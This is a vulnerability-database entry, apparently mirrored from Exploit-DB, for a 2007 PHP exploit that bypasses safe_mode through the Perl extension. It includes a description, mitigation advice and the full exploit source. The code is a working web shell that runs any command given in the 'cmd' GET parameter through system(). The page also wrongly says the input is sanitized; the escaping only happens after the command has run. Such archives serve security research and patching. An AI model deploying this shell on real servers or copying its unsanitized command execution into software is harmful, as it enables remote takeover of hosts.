header-logo
Suggest Exploit
vendor:
PHP
by:
NetJackal
7.5
CVSS
HIGH
Safe_mode Bypass
78
CWE
Product Name: PHP
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

PHP Perl Extension Safe_mode Bypass Exploit

This exploit allows an attacker to bypass safe mode restrictions in PHP by leveraging the PHP Perl extension. The attacker can execute arbitrary commands on the target system by providing a command through the 'cmd' parameter in the GET request. The exploit checks if the Perl extension is loaded and if the 'cmd' parameter is empty, it sets a default command based on the operating system. The Perl extension is then used to execute the command and the output is displayed in a textarea element on the page. The 'cmd' parameter is also sanitized to prevent HTML injection.

Mitigation:

To mitigate this vulnerability, the PHP Perl extension should be disabled or removed if not required. Additionally, input validation and sanitization should be implemented to prevent command injection attacks.
Source

Exploit-DB raw data:

<?php

##########################################################
###----------------------------------------------------###
###----PHP Perl Extension Safe_mode Bypass Exploit-----###
###----------------------------------------------------###
###-Author:--NetJackal---------------------------------###
###-Email:---nima_501[at]yahoo[dot]com-----------------###
###-Website:-http://netjackal.by.ru--------------------###
###----------------------------------------------------###
##########################################################

if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
$perl=new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('".$_GET['cmd']."')");
echo "&lt;/textarea&gt;";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>"

?>

# milw0rm.com [2007-08-25]

Navigation

Suggest Exploit

Services By CQR